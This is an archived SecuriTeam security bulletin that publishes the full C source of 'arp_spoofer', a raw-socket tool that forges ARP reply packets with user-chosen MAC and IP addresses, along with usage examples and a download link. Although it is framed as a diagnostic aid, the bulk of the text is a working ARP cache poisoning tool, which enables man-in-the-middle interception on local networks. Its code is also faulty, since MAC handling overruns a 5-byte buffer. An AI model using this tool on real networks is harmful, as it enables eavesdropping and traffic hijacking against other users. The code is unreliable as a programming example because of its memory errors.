[TOOL] arp_spoofer - Full ARP Packets Manipulation

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



arp_spoofer - Full ARP Packets Manipulation
------------------------------------------------------------------------


SUMMARY



DETAILS

This program (coded in C using PF_PACKET sockets) allows full manipulation
of ARP packets, including specification of Source MAC/IP Addresses and
Destination MAC/IP Addresses.

This can be useful when diagnosing networking problems including
host/switch ARP Poisoning testing, and router testing.

Source code:
/*************************************************
* [ ARP SPOOFER ] created by phonix_04
*
* This is an arp spoofer, that allows users to
* specify both IP and MAC addresses of the
* packet.
*
* Contact:
* Email: phonix.04@xxxxxxxxx
*
*************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <features.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#include <sys/ioctl.h>
#include <linux/sockios.h>
#include <linux/if.h>

typedef int SOCKET;

#define ROOT 0
#define TRUE 1
#define FALSE 0
#define ARG_COUNT 1+5

struct mac_address {
unsigned char hardware[5];
};

SOCKET create_socket(int root) {
SOCKET sd;
if (root == 1) {
if (geteuid() != ROOT) {
printf("Need root to run this prog\n");
exit(-1);
}
}

sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
return sd;
}

void *create_packet(struct mac_address *mac_source, struct mac_address
*mac_target, char *ip_source, char *ip_target)
{
char *packet = (char *)malloc(60);
int x;
memset(packet, 0, 60);

for(x=0; x<=6; x++) {
packet[x] = *((char *)mac_target+x);
}

for(x=0; x<=6; x++) {
packet[6+x] = *((char *)mac_source+x);
}

*(unsigned short *)(packet+12) = (unsigned short)htons(0x0806);
*(unsigned short *)(packet+14) = (unsigned short)htons(1);
*(unsigned short *)(packet+16) = (unsigned short)htons(0x0800);
*(unsigned char *)(packet+18) = 6;
*(unsigned char *)(packet+19) = 4;
*(unsigned short *)(packet+20) = (unsigned short)htons(2);

for(x=0; x<=6; x++) {
packet[22+x] = *((char *)mac_source+x);
}

*(unsigned long *)(packet+28) = inet_addr(ip_source);

for(x=0; x<=6; x++) {
packet[32+x] = *((char *)mac_target+x);
}

*(unsigned long *)(packet+38) = inet_addr(ip_target);

return packet;
}

struct sockaddr_ll* create_interface_sockaddr(SOCKET sd, char *interface)
{
struct ifreq ifreq;
static struct sockaddr_ll sll;

memset(&sll, 0, sizeof(struct sockaddr_ll));
strncpy(ifreq.ifr_ifrn.ifrn_name, interface, IFNAMSIZ);
if (ioctl(sd, SIOCGIFINDEX, &ifreq) < 0) {
printf("Error Getting Interface Index\n");
exit(-1);
}
sll.sll_family = AF_PACKET;
sll.sll_ifindex = ifreq.ifr_ifru.ifru_ivalue;
return &sll;
}

void send_packet(SOCKET sd, void *packet, int size, char *interface) {
struct sockaddr_ll *sll;
sll = create_interface_sockaddr(sd, interface);
if (sendto(sd, packet, size, 0, (struct sockaddr *)sll, sizeof(struct
sockaddr_ll)) < 0) {
printf("Error Sending Packet\n");
exit(-1);
}
}

void convert_mac(const char *input, struct mac_address *output) {
int x, y;
char data[6*2];
memset(output, 0, sizeof(struct mac_address));
strncpy(data, input, 6*2);
for(x=0; x<=6*2; x++) {
if (data[x] >= 'a' && data[x] <= 'f') {
data[x] = data[x] - 0x20;
}
}

for(x=0, y=0; x<=6*2; x+=2, y++) {
if (data[x] >= 'A' && data[x] <= 'F') {
output->hardware[y] = ((data[x] - 55) * 0x10);
} else {
output->hardware[y] = ((data[x] - 0x30) * 0x10);
}

if (data[x+1] >= 'A' && data[x] <= 'F') {
output->hardware[y] |= (data[x+1] - 55);
} else {
output->hardware[y] |= (data[x+1] - 0x30);
}
}
}

void print_usage(char **args) {
char *app_name = *(char **)((char *)args+0);
printf("USAGE: %s INTERFACE MAC_SOURCE MAC_DEST IP_SOURCE IP_DEST\n",
app_name);
printf("EXAMPLE: %s eth0 000FFDA32EFA A33AD553AF6F 192.168.0.1
192.168.0.2\n", app_name);
}

void print_banner() {
printf("\n====[ARP SPOOFER ]=====================\n");
printf("===========[ CREATED BY PHONIX_04 ]====\n\n");
}


int main(int argc, char **argv) {
SOCKET sd;
void *packet;
struct mac_address mac_source, mac_dest;

print_banner();
if (argc != ARG_COUNT) {
print_usage(argv);
exit(-1);
}
convert_mac(argv[2], &mac_source);
convert_mac(argv[3], &mac_dest);

sd = create_socket(TRUE);
if (sd < 0) {
printf("Error Creating Socket\n");
}

packet = create_packet(&mac_source, &mac_dest, argv[4], argv[5]);
send_packet(sd, packet, 60, argv[1]);

free(packet);

printf("=======[ SUMMARY ]=====================\n");
printf(" Packet Sent Successfully\n");
printf(" Using Interface: %s\n", argv[1]);
printf(" Source Mac: %s\n", argv[2]);
printf(" Target Mac: %s\n", argv[3]);
printf(" Source IP: %s\n", argv[4]);
printf(" Dest IP: %s\n", argv[5]);
printf("========================================\n");
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:phonix.04@xxxxxxxxx>
phonix.04.
Download the tool:
<http://packetstormsecurity.org/UNIX/security/arp_spoofer.tar.gz>
http://packetstormsecurity.org/UNIX/security/arp_spoofer.tar.gz



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Windows Server 2003 and XP SP2 LAND Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By sending a TCP packet with SYN flag set, ... struct in_addr src, dst; ... struct tcphdr * tcph; ...
    (Securiteam)
  • [NT]Microsoft Windows WRITE_ANDX SMB Command Handling Kernel DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Windows Vista SP1 with latest security updates ... Invalid system memory was referenced. ... Srv.sys is the driver that will process the received SMB packet, ...
    (Securiteam)
  • [NT] Timbuktu Pro Path Traversal and Log Injection
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Several fields of the packet ... The other bug is a logging file content manipulation vulnerability ... chunk should be set ...
    (Securiteam)
  • [UNIX] PPPd DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Point-to-Point Protocol for Unix systems". ... It reads in the packet at line 932, ... The loop continues processing the packet as long as len is!= 0. ...
    (Securiteam)
  • [NT] Technical Description of the SSL PCT Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... thorough and detailed analysis of the vulnerability in MS's SSL library is ... the variable N is taken from the packet itself. ... In this context a "valid field value" is one that allows the execution ...
    (Securiteam)